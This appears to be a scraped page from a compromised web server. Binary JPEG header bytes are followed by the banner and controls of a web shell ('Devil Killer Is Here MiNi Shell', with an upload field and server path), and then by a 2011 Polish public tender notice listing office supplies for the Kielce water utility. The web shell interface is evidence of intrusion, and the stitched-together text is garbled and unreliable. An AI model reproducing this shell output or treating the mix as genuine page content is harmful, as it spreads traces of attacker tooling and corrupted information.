JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111027/282177-N-2011.html

<p class="kh_header"><b>Kielce: Sukcesywna dostawa papieru i art. biurowych</b><br>
<b>Numer ogłoszenia: 282177 - 2011; data zamieszczenia: 27.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa papieru i art. biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania jest sukcesywna dostawa papieru i art. biurowych według poniższego zestawienia:
1.Antyrama 60/90	- 10 szt.
2.Blok do biuwaru 100 kartek -300 szt.
3.Blok szkolny A4 50 kartek-	200 szt.
4.Blok szkolny A5 50 kartek-	150 szt.
5.Blok techniczny A4- 12 szt.
6.Breloczki na klucze -	400 szt.
7.Cienkopis  - czarny z metalową końcówką -	500 szt.
8.Cienkopis  - niebieski z metalową końcówką	-500 szt.
9.Cienkopis   - zielony z metalową końcówką-	300 szt.
10.Cienkopis  - czerwony z metalową końcówką-	200 szt.
11.Cienkopis - brązowy z metalową końcówką	- 40 szt.
12.Cienkopis typ PIN 05-200, czarny, wodoodporny, do aparatu do liczenia kolonii bakterii-1 szt.      
13.Datownik plastikowy automat samotuszujący	- 5 szt.
14.Długopis samoprzylepny-	  12 szt.
15.Długopis  z automatycznym wkładem, gumowym uchwytem-niebieski- 500 szt.
16.Długopis z wymiennym wkładem, obudowa biała z nadrukiem firmowym -800 szt.
17.Dziurkacz  pojedynczy z metalową podstawką i uchwytem z niełamliwego plastiku lub metalowym; możliwość dziurkowania min. 25 kartek; wysuwany ogranicznik -	25 szt.18.Dziurkacz wykonany z metalu; możliwość dziurkowania min. 40 kartek; wysuwany ogranicznik formatu -	    8 szt.
19.Dziurkacz  podwójny na minimalną ilość kartek-	    1 szt. 
20.Etykiety samoprzylepne A4 - 105*57 mm -	  2 ryzy
21.Etykiety samoprzylepne A4 - 105*74 mm -	  2 ryzy
22.Flamastry  po 4 kolory w kpl. - 10 kpl.
23.Folia do bindowania A4;200 mic.   1op = 100 szt. -	   10 op.
24.Folia do laminarki  A4; 100 mikronów 1op = 100 szt	-  6 op.
25.Folia do drukarki atramentowej A4;1op= 100 szt (przeźroczysta  z jednej strony gładka z drugiej chropowata)-2 op.
26.Folder sztywny A4(ofertówka) -  100 szt.
27.Grzbiety do bindowania   kolor granatowy -   O 6 -    1op.=100szt	-	   2 op.
28. Grzbiety do bindowania   kolor granatowy -  O 8 -    1op.=100szt	-	   1 op.
29.Grzbiety do bindowania   kolor granatowy - O 10 -  1op.=100szt	-	   4 op.
30.Grzbiety do bindowania   kolor granatowy -  O 12,5 - 1op.=100szt	-	   2 op.
31.Grzbiety do bindowania   kolor granatowy -  O 14 -   1op.=100szt	-2 op.
32. Grzbiety do bindowania   kolor granatowy -  O 16 -   1op.=100szt	-	   1 op.
33.Grzbiety do bindowania   kolor granatowy - O 18 -  1op.=100szt	-	   4 op.
34.Grzbiety do bindowania   kolor granatowy - O 20 -  1op.=100szt	-	  2 op.
35.Grzbiety do bindowania   kolor granatowy - O 22 -  1op.=100szt	-	  1 op.
36.Grzbiety do bindowania   kolor granatowy - O 25 - 1op.=100szt	- 1 op.
37.Gumki do ścierania wymiar 1,5-2 x 3,5-4 cm nie uszkadzające   powierzchni papieru   przy ścieraniu- 150 szt.
38.Gumka recepturka-5 kg
39.Kalka ołówkowa, fioletowa 1op = 50 ark. - 5 op.
40.Kalkulator biurowy o dużych klawiszach, 12-to pozycyjny wyświetlacz, funkcja sprawdzania i poprawy obliczeń do 100 kroków, funkcja checz&correct, obliczanie podatku VAT, suma całkowita, obliczanie procentowe, zmiana zanku, klawisz podwójnego i potrójnego zera -15 szt.
41.Kartki świąteczne z życzeniami,min.6 wzorów, razem z kopertami  Boże Narodzenie,Wielkanoc	-  260szt. 
42.Karton do bindowania A-4 250g. kolor niebieski 1op. = 100 szt.	-	10 op.
43.Karton wizytówkowy A4  1op =20 szt kolor: biały i kremowy-	80 op.
44.Klej w sztyfcie 15 gram -  100 szt.
45.Klej w płynie 50 ml -  150 szt.
46.Klips do papieru - metal. 1op.=12 szt, różne wymiary: 15,19,25,32,41,
51 po  5 op. każdego wymiaru-	30 op.             
47.Klips do akt-plast. do spinania dokumentów - biały 1op.=100 szt.- 1 op.
48.Kołonotatnik A4 50 kartek	-	10 szt.
49.Kołonotatnik A5 50 kartek-	10 szt.
50.Koperty samoprzylepne C 6  białe, 1op = 1000 szt.	-30 op.
51.Koperty samoprzylepne C 6 okno prawe białe, 1op = 1000 szt.	-5 op.
52.Koperty białe  C 5 z paskiem HK, 1op = 500 szt.-	10 op.
53.Koperty białe  B 4 z paskiem HK 250x253, 1op = 500 szt.	-	  2 op.
54.Koperta biała B4  samoprzylepne z rozszerzonymi bokami i spodem 
250x534x40	- 250 szt.
55.Koperta biała z zabezpieczeniem powietrza B4 250x350	- 100 szt.
56.Korektor w taśmie pokrywa każdy rodzaj tuszu; szerokość taśmy  min.5 mm; długość min.9 m	- 230 szt.
57.Korektor w pisaku szybkoschnący płyn; cienka metalowa końcówka; pojemność min. 8 ml-	50 szt.
58.Koszulki foliowe na płyty CD -         300 szt.
59.Koszulka groszkowa na katalogi A4,170mic,op.10 szt. przeźroczysta, grzbiet harmonijka na dużą ilość dokumentów	-         210 op.
60.Linijka plastikowa przeźroczysta 20 cm- 50 szt.  	                                                                   
61.Linijka plastikowa przeźroczysta -  30 cm -	20 szt.	    
62.Linijka plastikowa przeźroczysta -  40 cm	-	20 szt.	    
63.Litery samoprzylepne: wys.10mm, szer. 10mm kolor czarny		-	  5 ark.
64.Litery samoprzylepne: wys.10mm, szer. 10mm kolor czerwony	-	  3 ark.
65.Litery samoprzylepne: wys.10mm, szer. 10mm kolor żółty -	  3 ark.	
66.Litery samoprzylepne: wys.10mm, szer. 10mm kolor zielony	-	  3 ark.
67.Litery samoprzylepne: wys. 15 mm, szer. 15mm kolor czarny		-	  3 ark.
68.Litery samoprzylepne: wys. 15 mm, szer. 15mm kolor czerwony- 3 ark	
69.Litery samoprzylepne: wys. 15 mm, szer. 15mm kolor żółty-  3 ark 
70.Litery samoprzylepne: wys. 15 mm, szer. 15mm kolor zielony	-	  3 ark 
71.Cyferki samoprzylepne: wys. 15 mm, szer. 10 mm kolor czary	-	10 ark.
72.Cyferki samoprzylepne:wys.15 mm, szer. 10 mm kolor czerwony -	  5 ark.	   
73.Cyferki samoprzylepne: wys.15 mm, szer. 10 mm kolor żółty	-	  5 ark	
74.Cyferki samoprzylepne: wys.15 mm, szer. 10 mm kolor zielony	-	  5 ark.
75.Litery samoprzylepne: wys. 5 cm,szer.4 cm kolor biały		-	20 ark.
76.Litery samoprzylepne: wys. 5 cm,szer.4 cm kolor czarny		-	20 ark.
77.Litery samoprzylepne: wys. 5 cm,szer.4 cm kolor niebieski		-	20 ark.
78.Cyferki samoprzylepne: wys. 5 cm,szer.4 cm kolor biały		-	20 ark.
79.Cyferki samoprzylepne: wys. 5 cm,szer.4 cm kolor czarny		-	20 ark.
80.Cyferki samoprzylepne: wys. 5 cm,szer.4 cm kolor niebieskie	-	20 ark.
81.Maczałka									-	10 szt. 
82.Mapa turystyczno-topograficzna Kielce i okolice			-	10 szt.
83.Marker atramentowy, okrągła końcówka-możliwość pisania 
po    każdego rodzaju powierzchni  o gr. 2,2 - 2,5 mm, czarny		-	100 szt.
84.Marker atramentowy, okrągła końcówka-możliwość pisania 
po    każdego rodzaju powierzchni  o gr. 2,2 - 2,5 mm, niebieski	-	60 szt.
85.Marker atramentowy, okrągła końcówka-możliwość pisania 
po    każdego rodzaju powierzchni o gr. 2,2 - 2,5 mm, zielony		-	60 szt.
86.Marker atramentowy, okrągła końcówka-możliwość pisania 
po    każdego rodzaju powierzchni o gr. 2,2 - 2,5 mm, czerwony	-	60 szt.
87.Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka 
-gr. linii pisania 0,8 - 1,2 mm -  srebrny-	50 szt.
88.Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka		
- gr. linii pisania 0,8 - 1,2 mm -  czerwony	 - 2 szt. 
89.Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka  - gr. linii pisania 2,2 - 2,8 mm - srebrny -	50 szt.
90.Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka - gr. linii pisania 0,8 - 1,2 mm - złoty	-	50 szt.
91.Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka
        - gr. linii pisania 2,2 - 2,8 mm - złoty					-	50 szt.
92.Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka - gr. linii pisania 0,8 - 1,2 mm - czarny					-	50 szt.
93.Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka  - gr. linii pisania 2,2 - 2,8 mm - czarny					-	50 szt.
94.Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka
 - gr. linii pisania 0,8 - 1,2 mm - brązowy				-	50 szt.
95.Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka - gr. linii pisania 2,2 - 2,8 mm - brązowy-	50 szt.
96.Marker czarny do opisywania płyt CD					-	50 szt.
97.Naboje do piór Pelikan  dł. 7 mm (po 5 szt), niebieskie			-	20 op.
98.Naboje do piór Pelikan  dł. 7 mm (po 5 szt), czarne			-	10 op.
99.Notes samoprzylepny      75x75mm 1bl.=100kart.			-	400 bl.
100.Notes samoprzylepny  76x76mm mix kolor 1bl.=400 kart.		-	  20 bl.
101.Notes samoprzylepny 102x152 - kratka 1bl.=100 kart.			-	170 bl.
102.Notes samoprzylepny 50x38 mm						-	100 bl.
103.Nożyczki ze stali nierdzewnej; dł. min. 20,5 cm				-	40 szt.
104.Nożyczki krawieckie ze stali nierdzewnej dł. 23 cm			-	  3 szt.
105.Numerator, profesjonalny automat szkieletowy w metalowej obudowie, samo tuszujący z możliwością wielokrotnego powtarzania odbić co najmniej sześciokrotnie						-	  1 szt.  
106.	Ofertówka / koszulka A4 wpinana, 40 mic.groszkowa, 1op = 100 szt	-	150 op.                                                  
107.	Ofertówka /koszulka A5  wpinana, 40 mic.groszkowa, 1op = 100 szt	-	  10 op.
108.	Ofertówka z nadrukiem firmowym A4  zgodnie ze wzorem dostępnym w Dz.Administracji Wodociągów Kieleckich                                                            -  1000 szt.
109.Okładka na dyplom A4 kolor granat sztywna okładka o fakturze skóry z ozdobną tasiemką; 80 szt. - złoty napis i logo zg. ze wzorem dostępnym w Dz.Administracji, 
20 szt. - bez napisu		                                                               -	100 szt.
110.	Okładka na dyplom A4 kolor bordowy sztywna okładka o fakturze skóry z ozdobną  tasiemką; 100 szt. - złoty napis i logo zg. ze wzorem dostępnym w Dz.Administracji,   50 szt. - bez napisu	-	150 szt.
111.	Okładka na dyplom A4 kolor ciemna zieleń sztywna okładka o fakturze skóry z ozdobną 
tasiemką; 80 szt. - złoty napis i logo zg. ze wzorem dostępnym w Dz.Administracji,  
20 szt. - bez napisu -	100 szt.
112.	Ołówek z drewna, miękki z gumką-	150 szt.			
113.Ołówek automatyczny z gumowym uchwytem; wyposażony w wymienną gumkę; chowana prowadnica grafitu, gr. 0,5mm	-	  80 szt.
114.Papier ksero A4 80 g/m2; CIE 166					-         2000 ryz
115.Papier ksero A4 80 g/m2; CIE 146					-         1000 ryz
116.Papier ksero A3 80 g/m2; CIE 166					-	   50 ryz
117.Papier ksero A3 80 g/m2; CIE 146					-	   10 ryz
118.Papier ksero A2 80 g/m2; CIE 166  1 ryza = 500 ark.	-	    2 ryzy
119.Papier ksero A2 80 g/m2; CIE 146  1 ryza = 500 ark.-	    2 ryzy
120.Papier komp. 240x12x1 2000 składanek	-	80 kartonów
121.Papier komp. 375x12x1 2000 składanek-	20 kartonów
122.Papier komp. 240x12x2 kopia kolor 900 składanek-	10 kartonów
123.Papier kancelaryjny A3 w kratkę 1op=500 ark.				-	  2 op.
124.Papier kolorowy, barwiony w masie, A4 80g mix, kolory intensywne: niebieski, 
żółty, czerwony, zielony	- 6 ryz
125.Papier A4 ksero, różne kolory: niebieski, żółty, zielony, pomarańczowy, błękitny, czerwony    -	  6 ryz
126.apier pakowy szary 100x120 cm, 70g/m2 -	300 ark.
127.	Papier fotograficzny A4-180 g/m2 błysk (po 50 szt)	-	   10 op.
128.Papier A4 samoprzylepny, czerwony	-	  50 ark.
129.Papier A4 samoprzylepny, zielony-	  50 ark.
130.Papier A4 samoprzylepny, niebieski	-	  50 ark.
131.Papier A4 samoprzylepny, żółty	-	  50 ark.
132.Papier A4 samoprzylepny, biały-	150 ark.
133.Pinezka tablicowa (po 50 szt)	-	   20 op.
134.Pinezka srebrna 1 op.=10 pudełeczek	-	   20 op.
135.	Piórnik na przybory do pisania; z pleksy z przegródkami 3 wzory np. 
prostokątny, walec-	  25 szt.
136.Półka na dokumenty w formacie A4	-	  40 szt.
137.Pojemnik na czasopisma tekturowy, ścięty, gr.-8 cm-	  50 szt.
138.Pióro żelowe z wymiennym wkładem- gr.0,5 mm, czarne-	160 szt.
139.Pióro żelowe z wymiennym wkładem, gr. 0,5mm niebieskie-	160 szt.
140.Plan Miasta Kielce aktualny, składany-	  30 szt.
141.	Podkład na biurko; format-600x 400 mm, roczne kalendarium na każdej 
planszy, papier offset 90 g/m2 ; oprawa grzbietowa, klejona                -             50 szt.
142.Poduszka do stempli 70*110 mm nasączona tuszem, obudowa metal	- 5 szt.
143.	Przekładki kartonowe wykonane z grubego, ekologicznego kartonu 190 g/m2   
1/3 A4 1 op.=100 szt. niebieskie	                                                          -	25 kpl.
144.Przekładka alfabetyczna A4 kartonowa; kolorowa A-Z			-	20 kpl.
145.Przekładka numeryczna A4 kartonowa 1-31				-	20 kpl.
146.Pudełko organizer na 100 szt. płyt CD - zamykane			-	    5 szt.
147.	Reklamówka firmowa większy rozmiar zg. ze wzorem dostępnym
 w Dz.Administracji	                                                                       -	900 szt.
148.Reklamówka firmowa mniejszy rozmiar	 zg. ze wzorem dostępnym 
w Dz.Administracji			                                    	-	500 szt.
149.Rysiki do ołówków po 12 szt, twardość HB, 2B  grubość- 0,5mm	-	  80 op. 
150.Rysiki do ołówków po 12 szt, twardość HB, 2B  grubość- 0,6mm	-	  10 op.
151.Rysiki do ołówków po 12 szt, twardość HB, 2B  grubość- 0,7mm	-	  10 op.
152.Rolka kasowa, termiczna  szer.57mm, dł.30 m.	-	  12 szt.
153.Rozszywasz	-	  20 szt.
154.Segregator A4/75 z wymienną etykietą okleina PCV na zewnątrz  i wewnątrz segregatora; brzegi dolne okucie metalowe, różne kolory	-        1300 szt.
155.Segregator A4/75 kartonowy z okuciem- 	200 szt.
156.Segregator A4/50 z wymienną etykietą okleina PCV na zewnątrz i wewnątrz segregatora; brzegi dolne okucie metalowe, różne kolory	-	600 szt.
157.Segregator A4/50 kartonowy z okuciem					-	  50 szt.
158.Segregator A5/75 z wymienną etykietą okleina PCV na zewnątrz  i wewnątrz segregatora; brzegi dolne okucie metalowe`-	120 szt.
159.	Segregator A5/75 kartonowy z okuciem					-	  40 szt.
160.Segregator ofertowy  A-4 wykonany z wysokiej jakości folii PCV z przeźroczystymi kieszeniami na przedniej okładce i grzbiecie-wyposażony w mechanizm 4-ringowy w kształcie litery D kolor biały, szer. 75mm-	  20 szt.
161.Segregator ofertowy A-4 wykonany z wysokiej jakości folii PCV z przeźroczystymi kieszeniami na przedniej okładce i grzbiecie- wyposażony w mechanizm 4-ringowy 
w kształcie litery D, kolor biały szer. 50mm	                                   -	  20 szt.
162.Segregator ofertowy A-4 wykonany z wysokiej jakości folii PCV z przeźroczystymi kieszeniami na przedniej okładce i grzbiecie-wyposażony w mechanizm 4-ringowy 
w kształcie litery D kolor biały szer. 25mm	                                   -	  10 szt.
163.Segregator na Dziennik Ustaw						-	  30 szt.
164.Segregator na Monitor Polski						-	  20 szt.
165.Skoroszyt tekturowy pełny A4						-	600 szt.
166.Skoroszyt  tekturowy pełny oczko A4					-         1500 szt.
167.Skoroszyt tekturowy ? oczko  A4					-         1800 szt.
168.Skoroszyt zawieszkowy ? A4						-	200 szt.
169.Skoroszyt plastikowy wpinany A4, różne kolory			-         2000 szt.
170.Skoroszyt plastikowy miękki A4, różne kolory				-	200 szt.
171.Skorowidz A4, 96 kartek; op. introlig					-	  10 szt.
172.Skorowidz A5, 96 kartek; op. introlig					-	  15 szt.
173.Spinacz krzyżowy na dokumenty					-	  10 op.
174.Spinacze R-28, 1op. = 10 pudełeczek					-	  50 op.
175.Spinacze duże R-50, 1 op. = 10 pudełeczek				-	  10 op.
176.Sznurek konopny waga  1op.= 0,5 kg.					-	   5 szt.
177.Sznurek dratwa waga 1 op.=0,5 kg.					-	   5 szt.
178.Tablica korkowa, 60 x 90 rama drewniana				-	  10 szt.
179.Taśma klejąca, 24 x 30 mb						-	150 szt.
180.Taśma pakowa szara, 48 x 50 mb					-	  40 szt.
181.Taśma izolacyjna z PE, szer. 20-25 mm, dł.ok. 25m-czerwona		-	    3 szt.
182.Taśma izolacyjna z PE, szer. 20-25 mm, dł.ok. 25m-niebieska		-	    3 szt
183.Taśma izolacyjna z PE, szer. 20-25 mm, dł.ok. 25m-żółta		-	    2 szt
184.Taśma pakowa papierowa szara 60mm x 50m				-	    8 szt.
185.Taśma papierowa żółta 50x33 malarska				-	5 rolek
186.Taśma papierowa żółta wąska						-	5 rolek
187.Taśma do metkownicy jednorzędna					-	1 rolka
188.Taśma dwustronnie przylepna, wąska 1,5 - 2,5 mm		            -	 15 szt.
189.Teczka tekturowa A4, firmowa, lakierowana UV jednostronnie,gram.250 druk w pełnym kolorze 4+0 -	500 szt.
190.Teczka do podpisu A4 grzbiet harmonijka; 15 kart; oprawa nitro, 
         kolory do wyboru							-	  20 szt.
191.Teczka na rzep A4 szerokość grzbietu min. 4 cm; PCV okleina	-	  50 szt.
192.Teczka z gumką A4 kolor laminowana  min. 3 kolory do wyboru	-	500 szt.
193.Teczka tekturowa wiązana A4						-	300 szt.
194.Teczka A4 z klipem, klip o szer. min. 9 cm				-	  50 szt.
195.Teczka z  klipemA5 klip o szer. min. 9 cm				-	  50 szt.
196.Teczka twarda na rzep lub tasiemki grubość min. 5,0 cm		-	  50 szt.
197.Temperówka metalowa z metalowym ostrzem				-	  60 szt.
198.Tusz do stempli o pojemności min. 25 ml. kolory zielony, czerwony, czarny	- 25 szt.
199.Wałek barwiący IR czarny do kalk. Citizen				-	    2 szt.
200.Wąsy do skoroszytów - plast. 1op.=25 szt				-	    8 op.
201.Wizytownik na min. 96 wizytówek, 3 kolory do wyboru		-	  10 szt.
202.Wkład do długopisu wielkopojemny, gruby, metalowy-czarny		-	100 szt.
203.Wkład do długopisu wielkopojemny, gruby,metalowy-  niebieski	-	100 szt.
204.Wkład długopisu zwykły z grubą końcówką czarny			-	100 szt.
205.Wkład do długopisu firmowego-czarny wkłady muszą pasować do długopisów oferowanych w poz.16					-	100 szt.
206.Wkład do długopisu zwykły z grubą końcówką niebieski		-	100 szt.
207.Wkład do długopisu firmowego niebieski wkłady muszą pasować do długopisów oferowanych w poz.16					-	150 szt.
208.Wkład do długopisu popularny czarny					-	  50 szt.
209.Wkład do długopisu popularny niebieski				-	  50 szt.
210.	Wkład do długopisu Pentel czarny, niebieski				-	  50 szt.
211.Wkład do długopisów żelowych, gr. 0,5 mm, czarny			-	150 szt.
212.Wkład do długopisów żelowych, gr. 0,5 mm, niebieski			-	150 szt.
213.Zakreślacz żółty								-	100 szt.
214.Zakreślacz zielony							-	100 szt.
215.Zakreślacz różowy							-	100 szt.
216.Zakreślacz pomarańczowy						-	  80 szt.
217.Zakreślacz  niebieski							-	  80 szt.
218.Zeszyt A5 16 kart. w kratkę, miękka okładka				-	  60 szt.
219.Zeszyt A5 32 kart. w kratkę, miękka okładka				-	  60 szt.
220.Zeszyt A5 60 kart. w kratkę, miękka okładka				-	  60 szt.
221.Zeszyt A5 80 kart. w kratkę, miękka okładka				-	  60 szt.
222.Zeszyt A5 96 kart. w kratkę, twarda okładka				-	  65 szt.
223.Zeszyt A4/96 kart. w kratkę twarda okładka				-	  60 szt.
224.Zeszyt B5/160 kart. w kratkę twarda okładka				-	  30 szt.
225.Zeszyt A4 200 k. w kratkę twarda oprawa, kartki zszywane		-	  12 szt.
226.Zeszyty A4 w linię 100k. twarda oprawa				-	  10 szt.
227.Znaczniki samoprzylepne plastikowe zakładka indeksująca kolorowe-	100 op.
228.Zszywacz metalowy w plastikowej obudowie; zszywa min. 15 kartek -	  30 szt.
229.Zszywacz - zszywający jednorazowo 130 - 260 kartek	-	    2 szt.
230.Zszywacz mini	-	    5 szt.
231.Zszywki po 1000 szt, 1 op. zbiorcze=10 pudełeczek- 24/6		-	  50 op.
232.Zszywki po 1000 szt, 1 op. zbiorcze=10 pudełeczek- 23/24		-	   4 op.
233.	Zszywki po 1000 szt, 1 op. zbiorcze=10 pudełeczek
 -do zszywacza mini							-	   2 op.
234.	Zszywki długie, 1 op. zbiorcze = 10 pudełeczek - 23/8			-	   1 op.  
235.Zszywki długie, 1 op. zbiorcze = 10 pudełeczek - 23/10		-	   1 op.    
236.Zszywki długie, 1 op. zbiorcze = 10 pudełeczek - 23/13		-	   1 op.
237.Zszywki długie, 1 op. zbiorcze = 10 pudełeczek - 23/15	- 1 op.                                                                                                           238.	Zszywki długie, 1 op. zbiorcze = 10 pudełeczek - 23/17- 1 op.
Uwagi:
1.Do oferty należy załączyć wzór każdego towaru z nadanym numerem porządkowym wyszczególnionym w SIWZ.
2.Wzory należy złożyć w Biurze Obsługi Klienta do dnia 15.11.2011r. do godz. 945.
3.Przesyłka ze wzorami winna być zaadresowana tak jak oferta z dopiskiem Wzory do przetargu na sukcesywną dostawę papieru i art. biurowych.
4.Do oferty należy dołączyć spis przekazanych materiałów biurowych. 

5.Zamawiający zwróci wzory na wniosek Wykonawców, których oferty nie zostały wybrane; koszty przesyłki ponosi Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 30.19.00.00-7, 30.14.12.00-1, 44.11.15.20-7, 37.82.32.00-5, 39.29.80.00-7, 39.24.12.00-5, 18.93.71.00-7, 22.11.43.00-7, 22.90.00.00-9, 44.17.60.00-4, 39.54.11.30-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
